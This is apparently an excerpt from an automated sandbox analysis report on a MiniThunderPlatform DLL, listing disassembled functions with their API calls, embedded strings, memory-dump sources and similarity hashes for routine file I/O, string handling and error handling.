                                                                                                                                              Function 1003D480 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 81fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,?), ref: 1003D510
                                                                                                                                              • GetLastError.KERNEL32 ref: 1003D51B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(file read error), ref: 1003D53A
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC,?,00000000), ref: 1003D560
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFileH_prologLastReadThrowV01@@
                                                                                                                                              • String ID: .\asyn_file_device.cpp$file read error$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 3484420861-2565288009
                                                                                                                                              • Opcode ID: 95ddb5db941de951eb65dac18aa7beb7c65ffc3ee25062e437135e1610e47887
                                                                                                                                              • Instruction ID: c0c281210f757c9ddd7480c9d8b205b00b10e941ab7d572f13d9e89aa7bce22b
                                                                                                                                              • Opcode Fuzzy Hash: 95ddb5db941de951eb65dac18aa7beb7c65ffc3ee25062e437135e1610e47887
                                                                                                                                              • Instruction Fuzzy Hash: E9318976104B80AFC321CF28C884FABB7E5FB99314F408A1DF19A83641DB34B409CBA1
                                                                                                                                              Function 1003D5A0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,?), ref: 1003D632
                                                                                                                                              • GetLastError.KERNEL32 ref: 1003D63D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(file write error), ref: 1003D65D
                                                                                                                                              • _CxxThrowException.MSVCR71(00000001,102B5DEC), ref: 1003D684
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionFileH_prologLastThrowV01@@Write
                                                                                                                                              • String ID: .\asyn_file_device.cpp$file write error$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 2391062310-1122603868
                                                                                                                                              • Opcode ID: cd20233cf2fd9173745e2924df9b1c8de949f79f9abfef9cc84bf1c42f9938ca
                                                                                                                                              • Instruction ID: 714e6304edd5f1086b9823d01892f433de86ad78344183c3d8cc0d327307bb45
                                                                                                                                              • Opcode Fuzzy Hash: cd20233cf2fd9173745e2924df9b1c8de949f79f9abfef9cc84bf1c42f9938ca
                                                                                                                                              • Instruction Fuzzy Hash: 88317A75104680AFD721CB24C885FABB7E4FB99318F408A0DF49A87641DB34B415CBA2
                                                                                                                                              Function 1007518D Relevance: 13.6, APIs: 9, Instructions: 119COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10075192
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075215
                                                                                                                                              • memcpy.MSVCR71(000000AC,?,?), ref: 1007523E
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007526B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007529E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752BF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?), ref: 10075312
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007531F
                                                                                                                                                • Part of subcall function 1008B0B9: __EH_prolog.LIBCMT ref: 1008B0BE
                                                                                                                                                • Part of subcall function 1008B0B9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100751C7), ref: 1008B0DF
                                                                                                                                                • Part of subcall function 1008B0B9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100751C7), ref: 1008B0EF
                                                                                                                                                • Part of subcall function 1008B0B9: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100751C7), ref: 1008B0FF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$?assign@?$basic_string@V12@V12@@$??1?$basic_string@H_prolog$mallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3168742969-0
                                                                                                                                              • Opcode ID: 8673f5cd12c17fd5749157d9eb956ffc49b8067a2fcb973f89705782b7e345ee
                                                                                                                                              • Instruction ID: 3eb2f3cadc2000190810850abd59918923e050d2fbe83369890972ec13d97ddf
                                                                                                                                              • Opcode Fuzzy Hash: 8673f5cd12c17fd5749157d9eb956ffc49b8067a2fcb973f89705782b7e345ee
                                                                                                                                              • Instruction Fuzzy Hash: 80514A71900649DFDB18CBB4C888BDEFBF4FF09301F04865AE4AA93281DB756549CBA0
                                                                                                                                              Function 1008C3F0 Relevance: 13.6, APIs: 9, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100090B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1023FE38,000000FF,10009AC5,?,?,?,?,?,?,1023FEC1,000000FF,10002F72), ref: 100090D6
                                                                                                                                                • Part of subcall function 100090B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,1023FEC1,000000FF), ref: 100090ED
                                                                                                                                                • Part of subcall function 100090B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,1023FEC1,000000FF), ref: 100090FB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1008C446
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1008C459
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1008C46A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1008C47C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1008C48F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1008C4A0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1008C4CA
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1008C4DD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1008C4EE
                                                                                                                                                • Part of subcall function 10093B00: RtlEnterCriticalSection.NTDLL(?), ref: 10093B2A
                                                                                                                                                • Part of subcall function 10093B00: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(resource_setting array index overflow), ref: 10093B4A
                                                                                                                                                • Part of subcall function 10093B00: _CxxThrowException.MSVCR71(?,102B6BA0,?), ref: 10093B6D
                                                                                                                                                • Part of subcall function 10093B00: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?), ref: 10093B89
                                                                                                                                                • Part of subcall function 10093B00: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10093B9E
                                                                                                                                                • Part of subcall function 10093B00: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10093BAB
                                                                                                                                                • Part of subcall function 10093B00: RtlLeaveCriticalSection.NTDLL(?), ref: 10093BB2
                                                                                                                                                • Part of subcall function 10009120: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000004,?,00000000,1023FE38,000000FF,1000A4FF), ref: 10009148
                                                                                                                                                • Part of subcall function 10009120: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10009156
                                                                                                                                                • Part of subcall function 10009120: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10009167
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?assign@?$basic_string@V12@V12@@$CriticalSection$EnterExceptionLeaveThrow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3370856523-0
                                                                                                                                              • Opcode ID: 35018db92ab3bebd8f45e4acb74e8ea9d02454acd35cd4ca20a5eae50a0fcdd8
                                                                                                                                              • Instruction ID: 0dfdcda582e11c660d040ea82f9ae4da52ad2cb7cb98f179b0e87b7184fb5eeb
                                                                                                                                              • Opcode Fuzzy Hash: 35018db92ab3bebd8f45e4acb74e8ea9d02454acd35cd4ca20a5eae50a0fcdd8
                                                                                                                                              • Instruction Fuzzy Hash: D2313C761083819FC325DB24C899BDBBBE8FFA8710F048A4DF59A83251DB346448CB52
                                                                                                                                              Function 100750AF Relevance: 13.5, APIs: 9, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100750B4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100750DA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100750EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100750FA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007510A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007511A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007512A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10075137
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10075144
                                                                                                                                                • Part of subcall function 100897A0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,102495B4,000000FF,10073A23), ref: 10089807
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1526739352-0
                                                                                                                                              • Opcode ID: 1173728a4c74ea614f845b87bc99c555f133df73805f45603d6c583c97feae5a
                                                                                                                                              • Instruction ID: 652716868ee6ede0c1e84fc6bd518db3191fe62db26dea4694d392614e744abe
                                                                                                                                              • Opcode Fuzzy Hash: 1173728a4c74ea614f845b87bc99c555f133df73805f45603d6c583c97feae5a
                                                                                                                                              • Instruction Fuzzy Hash: 88115B308046A6DFEB24DBB4C64C79DBBB0EB29704F1046CCE09B53292CBB02648CB51
                                                                                                                                              Function 1006C3B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 263COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,?), ref: 1006C3E3
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1006C3F5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006C411
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B24A0), ref: 1006C42E
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,00000000,?), ref: 1006C668
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,00000000,?), ref: 1006C67A
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 1006C3DA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@??3@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 141841468-152884079
                                                                                                                                              • Opcode ID: a0ec1178149c2fb485f2fa3e2df1e446940554cb68605acda30977b0170de29e
                                                                                                                                              • Instruction ID: 50850925a37db91f94779eaf9604553f5343c9fd228d0964f05d1cde44c392e0
                                                                                                                                              • Opcode Fuzzy Hash: a0ec1178149c2fb485f2fa3e2df1e446940554cb68605acda30977b0170de29e
                                                                                                                                              • Instruction Fuzzy Hash: B1B16CB49083999FC711CF28C490E66BFE2FF5A244F59869CE8C94B312D731E849CB95
                                                                                                                                              Function 10055310 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 250COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator), ref: 1005533F
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10055351
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005536D
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B24A0), ref: 1005538A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100555A8
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10055336
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??0exception@@??1?$basic_string@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 4260395333-152884079
                                                                                                                                              • Opcode ID: 16018ea83d0d828fa2feb9961af33045edf5cf681be8ba7e61d9dbf9e3c097eb
                                                                                                                                              • Instruction ID: 3222e4b870c6fd5cd9885682c2090ad26b25d47feae2b9274cabdce8297a85ca
                                                                                                                                              • Opcode Fuzzy Hash: 16018ea83d0d828fa2feb9961af33045edf5cf681be8ba7e61d9dbf9e3c097eb
                                                                                                                                              • Instruction Fuzzy Hash: ADA152B4108395CFC711CF28C0A0A5ABBE1EF59645B69C59DE8898F312D332EC49CF51
                                                                                                                                              Function 100AD29C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 167COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100AD397
                                                                                                                                              • memmove.MSVCR71(00000000,?,?,?,?), ref: 100AD42C
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100AD2A1
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV01@@$memmove
                                                                                                                                              • String ID: .\http_url_range_pipe.cpp$false$operation_ptr == _ayso_io_operation$thunder_assert
                                                                                                                                              • API String ID: 1653989680-652335753
                                                                                                                                              • Opcode ID: 88a82c5f1fc488dfdaa65c86bf4c0aafe434f24be6605a01f2232f8977ea0912
                                                                                                                                              • Instruction ID: fe574efb53010ff11a1fc1ad16444175ab9469814edc809e3f261bfcab26db13
                                                                                                                                              • Opcode Fuzzy Hash: 88a82c5f1fc488dfdaa65c86bf4c0aafe434f24be6605a01f2232f8977ea0912
                                                                                                                                              • Instruction Fuzzy Hash: E451AC75A00644DFCB10EFA8C884ADEBBF5EF58351F14845EE99B9B242CB30BA41CB51
                                                                                                                                              Function 10055120 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 73COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(adns_fail_cache,cache_millisec,00004E20,-00000004), ref: 100551D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,00000000,102450F7,000000FF,10055E4D,1004853A,1004853A,EC830008), ref: 100551E0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100551EF
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100551F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
